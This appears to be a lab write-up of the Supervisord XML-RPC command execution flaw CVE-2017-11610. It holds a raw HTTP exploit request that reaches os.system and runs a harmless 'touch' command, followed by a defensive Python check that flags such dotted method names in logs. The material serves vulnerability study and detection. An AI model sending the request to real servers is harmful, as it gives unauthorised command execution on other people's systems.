CVE-2017-11610: Supervisord Command Execution

Lab environment and introduction

Supervisord Remote Code Execution Vulnerability_Video Tutorial_i春秋_Cultivating a sense of security for the information age! (ichunqiu.com)

References

https://blogs.securiteam.com/index.php/archives/3348

https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html

https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610

burp

POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>
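
A log-review check for the request above, added here as an example and not taken from the original page or the Supervisor project: it parses captured XML-RPC bodies and flags any method name that is not a plain `namespace.method` pair, which is what sets the dotted attribute path in that request apart from routine calls. The matching rule, the function names, and the benign and multicall samples are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Assumption: legitimate calls look like "namespace.method" (one dot), for
# example supervisor.getState or system.listMethods.
SAFE_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9_]*\.[A-Za-z][A-Za-z0-9_]*$")

def called_methods(body):
    """Return every method name an XML-RPC request body asks the server to run."""
    body = body.strip()
    if "<!doctype" in body.lower():
        raise ValueError("XML-RPC requests have no use for a DTD")
    root = ET.fromstring(body)
    names = [root.findtext("methodName", default="").strip()]
    # system.multicall wraps further calls as structs with a "methodName" member.
    for member in root.iter("member"):
        if member.findtext("name", default="").strip() == "methodName":
            value = member.find("value")
            names.append("".join(value.itertext()).strip() if value is not None else "")
    return names

def suspicious_methods(body):
    """Return the called names that are not a plain namespace.method pair."""
    try:
        return [n for n in called_methods(body) if not SAFE_NAME.match(n)]
    except (ET.ParseError, ValueError):
        return ["<unparseable body>"]

# Method name and body taken from the request on this page.
PAGE_NAME = "supervisor.supervisord.options.warnings.linecache.os.system"
PAGE_BODY = ('<?xml version="1.0"?><methodCall><methodName>' + PAGE_NAME +
             '</methodName><params><param><string>touch /tmp/success</string>'
             '</param></params></methodCall>')
# Constructed samples: a routine status call and a multicall wrapper.
BENIGN_BODY = ('<?xml version="1.0"?><methodCall>'
               '<methodName>supervisor.getState</methodName><params/></methodCall>')
MULTICALL_BODY = ('<?xml version="1.0"?><methodCall><methodName>system.multicall'
                  '</methodName><params><param><value><array><data><value><struct>'
                  '<member><name>methodName</name><value><string>' + PAGE_NAME +
                  '</string></value></member><member><name>params</name><value>'
                  '<array><data/></array></value></member></struct></value></data>'
                  '</array></value></param></params></methodCall>')

if __name__ == "__main__":
    for label, body in [("page", PAGE_BODY), ("benign", BENIGN_BODY),
                        ("multicall", MULTICALL_BODY)]:
        print(label, suspicious_methods(body))
```

Bodies that fail to parse or carry a DTD are reported as unparseable rather than skipped, so malformed requests to /RPC2 still surface for review.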